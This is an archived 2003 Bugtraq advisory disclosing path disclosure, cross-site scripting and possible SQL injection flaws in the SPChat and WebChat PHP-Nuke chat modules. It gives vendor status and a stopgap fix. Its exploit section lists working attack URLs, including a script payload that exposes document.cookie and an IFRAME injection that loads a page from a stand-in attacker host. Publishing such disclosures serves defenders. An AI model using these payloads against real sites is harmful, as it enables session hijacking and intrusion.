[<prev] [next>] [day] [month] [year] [list]
Message-ID: <17057.1054420151@www61.gmx.net>
Date: Sun, 1 Jun 2003 00:29:11 +0200 (MEST)
From: Rynho Zeros Web <hackargentino@....net>
To: bugtraq@...urityfocus.com
Subject: [ PHP-Nuke :] Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
Vendor URL: http://www.saarport.net
Vuln Type: XSS (Cross Site Scripting), Path Disclosure, revealed of
DBUser Name, possible injection SQL
Status: Vendor contacted, In a moment estara available the patched
version.
(http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
Author: XyborG (http://www.rzw.com.ar)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Intro:
~~~~~~
SFChat & WebChat are very good and stable systems of chat online. But it
has his faults :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: The name of the WebChat module can change, I I will use that name.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
~~~~~~~~~
Vendor has contacted and In a moment estara available the patched version.
To Fix the script temporarily, you must erase this script of your Web, or
change its name so that nobody has access, but checks the Web of the creator
in search of the new patch, to be able to continue using this service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
~~~~~~~~
Web Chat 2.0 for PHP-Nuke:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Path Disclosure (see the source code):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules/WebChat/out.php
----- Source Code -----
<br />
<b>Warning</b>: Access denied for user: 'victim@...alhost' (Using password:
YES) in
<b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
</TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect
failed<BR>
<B>MySQL error</B>: 0 ()<BR>
Session halted.
----- Source Code -----
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Path
Disclosure:
~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Path Disclorure & revealed of DBUser Name & XSS, SQL Injection?
:
http://www.victim.com/modules/WebChat/in.php
http://www.victim.com/modules/WebChat/quit.php
http://www.victim.com/modules/WebChat/users.php
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SPChat Ver.
0.8.0:
~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>
----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----
(Note: Replace '?' by '<')
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
Powered by blists - more mailing lists